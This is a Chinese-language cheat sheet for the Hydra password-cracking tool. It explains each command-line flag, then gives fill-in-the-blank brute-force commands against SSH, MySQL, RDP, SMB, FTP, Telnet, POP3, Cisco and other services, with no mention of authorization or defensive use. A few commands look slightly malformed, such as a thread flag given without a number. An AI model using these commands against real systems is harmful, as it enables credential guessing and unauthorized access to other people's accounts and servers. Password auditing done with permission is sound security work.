参数详解

-l login 小写,指定用户名进行破解
-L file 大写,指定用户的用户名字典
-p pass 小写,用于指定密码破解,很少使用,一般采用密码字典
-P file 大写,用于指定密码字典
-s PORT 指定默认端口
-C使用冒号分割格式,例如“登录名:密码”来代替 -L/-P 参数
-e ns 额外的选项,n:空密码试探,s:使用指定账户和密码试探
-M file 指定目标ip列表文件,批量破解
-o file 指定结果输出文件
-f 找到第一对登录名或者密码的时候中止破解
-t tasks 同时运行的线程数,默认是16
-S大写,采用SSL链接
-w time 设置最大超时时间,单位
-v / -V 显示详细过程
-R 恢复爆破(如果破解中断了,下次执行 hydra -R /path/to/hydra.restore 就可以继续任务。)
-x 自定义密码

爆破协议举例

SSH暴力破解

hydra -L 用户名字典 -P 密码字典 -t -vV -o ssh.log -e ns IP ssh

mysql暴力破解

hydra -L 用户名字典 -P 密码字典 -t 5 IP mysql

远程桌面暴力破解

hydra -L 用户名字典 -P 密码字典 -t 1 IP rdp

使用hydra破解ssh的密码

hydra -L 用户名字典 -P 密码字典 -o ssh.log -e ns IP ssh

破解https:

hydra -m /index.php -l 用户名 -P 密码字典 IP https

破解teamspeak:

hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak

破解cisco:

hydra -P 用户字典 IP cisco
hydra -m cloud -P 密码字典 IP cisco-enable

破解smb:

hydra -l administrator -P 密码字典 IP smb

破解pop3:

hydra -l (muts)用户名 -P 密码字典 my.pop3.mail pop3

破解rdp:

hydra IP rdp -l administrator -P 密码字典 -V

破解http-proxy:

hydra -l admin -P 密码字典 http-proxy://127.0.0.1

破解telnet

hydra IP telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V

破解ftp:

hydra IP ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV